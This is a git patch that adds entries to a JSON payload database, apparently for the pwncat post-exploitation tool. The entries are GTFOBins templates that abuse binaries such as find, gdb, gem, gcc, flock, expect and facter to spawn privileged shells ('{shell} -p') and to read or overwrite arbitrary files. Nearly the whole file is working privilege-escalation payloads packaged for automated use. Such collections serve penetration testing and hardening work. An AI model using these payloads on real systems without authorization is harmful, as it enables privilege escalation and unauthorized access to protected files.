From c930925d273045a0dabd47ed68169b99c587853e Mon Sep 17 00:00:00 2001
From: John Hammond
Date: Sun, 17 May 2020 19:35:49 -0400
Subject: [PATCH] Added more GTFObins
---
 data/gtfobins.json | 212 +++++++++++++++++++++++++++++++++++++++------
 1 file changed, 185 insertions(+), 27 deletions(-)
diff --git a/data/gtfobins.json b/data/gtfobins.json
index 1f00130..49cb353 100644
--- a/data/gtfobins.json
+++ b/data/gtfobins.json
@@ -209,33 +209,6 @@
 "exit": "{ctrl_d}"
 }
 ],
-//-------------------------------------------------------------------
- "gawk": [
- {
- "type": "shell",
- "payload": "{command} 'BEGIN {{system(\"{shell} -p\")}}'",
- "exit": "exit"
- },
- {
- "type": "read",
- "stream": "print",
- "payload": "{command} // {lfile}"
- },
- {
- "type": "read",
- "stream": "raw",
- "payload": "{command} 'BEGIN {{system(\"{cat} {lfile}\")}}'"
- },
- {
- "type": "write",
- "stream": "print",
- "args": [
- "-v", "LFILE={lfile}",
- "'BEGIN {{ printf \"\" > LFILE; while (getline > 0){{ print >> LFILE; }} }}'"
- ],
- "exit": "{ctrl_d}"
- }
- ],
 //-------------------------------------------------------------------
 "base32": [
 {
@@ -641,7 +614,192 @@
 "args": ["$TF"]
 }
 ],
+//-------------------------------------------------------------------
+ "expand": [
+ {
+ "type": "read",
+ "stream": "print",
+ "payload": "{command}",
+ "args": ["{lfile}"]
+ }
+ ],
+//-------------------------------------------------------------------
+ "expect": [
+ {
+ "type": "shell",
+ "payload": "{command}",
+ "args": ["-c", "\"spawn {shell} -p; interact\""],
+ "exit": "exit\n"
+ },
+ {
+ "type": "read",
+ "stream": "raw",
+ "payload": "{command}",
+ "args": ["-c", "\"spawn {cat} {lfile}; interact\""]
+ }
+ // Theoretically we should be able to get File Write for this.
+ // Sine it has it own little subprocess, I can't seem to get stdin to funnel in.
+ ],
+//-------------------------------------------------------------------
+ "facter": [
+ {
+ "type": "shell",
+ "payload": "TF=$({mktemp} -d); echo 'exec(\"{shell} -p\")' > $TF/x.rb; FACTERLIB=$TF {command}",
+ "args": [""]
+ }
+ // This does not behave with sudo very often.
+ // Because it sets an environment variable, -E must be used
+ // when calling sudo (which pwncat currently does not have support for)
+ // and the user needs to be able to preserve the environment...
+ ],
+//-------------------------------------------------------------------
+ "find": [
+ {
+ "type": "shell",
+ "payload": "{command}",
+ "args": [".", "-exec", "{shell} -p", "\\;", "-quit"]
+ },
+ {
+ "type": "read",
+ "stream": "raw",
+ "payload": "{command}",
+ "args": [".", "-exec", "{cat} {lfile}", "\\;", "-quit"]
+ }
+ ],
+//-------------------------------------------------------------------
+ "flock": [
+ {
+ "type": "shell",
+ "payload": "{command}",
+ "args": ["-u", "/", "{shell} -p"]
+ },
+ {
+ "type": "read",
+ "stream": "raw",
+ "payload": "{command}",
+ "args": ["-u", "/", "{cat} {lfile}"]
+ },
+ {
+ "type": "write",
+ "stream": "base64",
+ "payload": "{command}",
+ "args": ["-u", "/", "{sh} -c \"{base64} -d > {lfile}\""],
+ "exit": "{ctrl_d}{ctrl_d}"
+ }
+ ],
+//-------------------------------------------------------------------
+ "fmt": [
+ {
+ "type": "read",
+ "stream": "raw",
+ "payload": "{command}",
+ "args": ["-pNON_EXISTING_PREFIX", "{lfile}"]
+ }
+ ],
+//-------------------------------------------------------------------
+ "fold": [
+ {
+ "type": "read",
+ "stream": "raw",
+ "payload": "{command}",
+ "args": ["-w99999999", "{lfile}"]
+ }
+ ],
+//-------------------------------------------------------------------
+ "ftp": [
+ {
+ "type": "shell",
+ "payload": "{command}",
+ "input": "!{shell} -p\n",
+ // Exit the shell, then exit the FTP client
+ "exit": "exit\nexit\n"
+ }
+ ],
+//-------------------------------------------------------------------
+ "gawk": [
+ {
+ "type": "shell",
+ "payload": "{command} 'BEGIN {{system(\"{shell} -p\")}}'",
+ "exit": "exit"
+ },
+ {
+ "type": "read",
+ "stream": "print",
+ "payload": "{command} // {lfile}"
+ },
+ {
+ "type": "read",
+ "stream": "raw",
+ "payload": "{command} 'BEGIN {{system(\"{cat} {lfile}\")}}'"
+ },
+ {
+ "type": "write",
+ "stream": "print",
+ "args": [
+ "-v", "LFILE={lfile}",
+ "'BEGIN {{ printf \"\" > LFILE; while (getline > 0){{ print >> LFILE; }} }}'"
+ ],
+ "exit": "{ctrl_d}"
+ }
+ 
],
+//-------------------------------------------------------------------
+ "gcc": [
+ {
+ "type": "shell",
+ "payload": "{command}",
+ "args": ["-wrapper", "{shell},-p,-s", "."]
+ }
+ ],
+//-------------------------------------------------------------------
+ "gdb": [
+ {
+ "type": "shell",
+ "payload": "{command}",
+ "args": ["-q", "-nx", "-ex", "'!{shell} -p'", "-ex", "quit"]
+ },
+ {
+ "type": "shell",
+ "payload": "{command}",
+ "args": ["-q", "-nx", "-ex", "'python import os; os.execl(\"{shell}\", \"{shell}\", \"-p\")'", "-ex", "quit"]
+ },
+ {
+ "type": "read",
+ "stream":"print",
+ "payload": "{command}",
+ "args": ["-q", "-nx", "-ex", "'set height 0'", "-ex", "'python print(open(\"{lfile}\").read())'", "-ex", "quit"]
+ },
+ {
+ "type": "write",
+ "stream":"print",
+ "payload": "{command}",
+ "args": ["-q", "-nx", "-ex", "'python import sys; open(\"{lfile}\",\"w\").write(sys.stdin.read())'", "-ex", "quit"],
+ "exit": "{ctrl_d}{ctrl_d}"
+ }
+ // We SHOULD be able to read base64 data... but for the life of me, I cannot get the whole file to come through. Leaving this alone.
+ // {
+ // "type": "write",
+ // "stream":"base64",
+ // "payload": "{command}",
+ // "args": ["-q", "-nx", "-ex", "'python import sys,base64; exec(\"\"\"with open(\"{lfile}\",\"wb\") as f:\\n\\tfor chunk in iter(lambda: sys.stdin.read(4), b\"\"):\\n\\t\\tf.write(base64.b64decode(chunk))\"\"\")'", "-ex", "quit"],
+ // "exit" : "{ctrl_d}"
+ // }
+ // ,
+ ],
+//-------------------------------------------------------------------
+ "gem": [
+ {
+ "type": "shell",
+ "payload": "{command}",
+ "args": ["open", "-e", "'{shell} -c {shell} -p'", "rdoc"]
+ },
+ {
+ "type": "read",
+ "stream" : "raw",
+ "payload": "{command}",
+ "args": ["open", "-e", "'{cat} {lfile}'", "rdoc"]
+ }
+ ],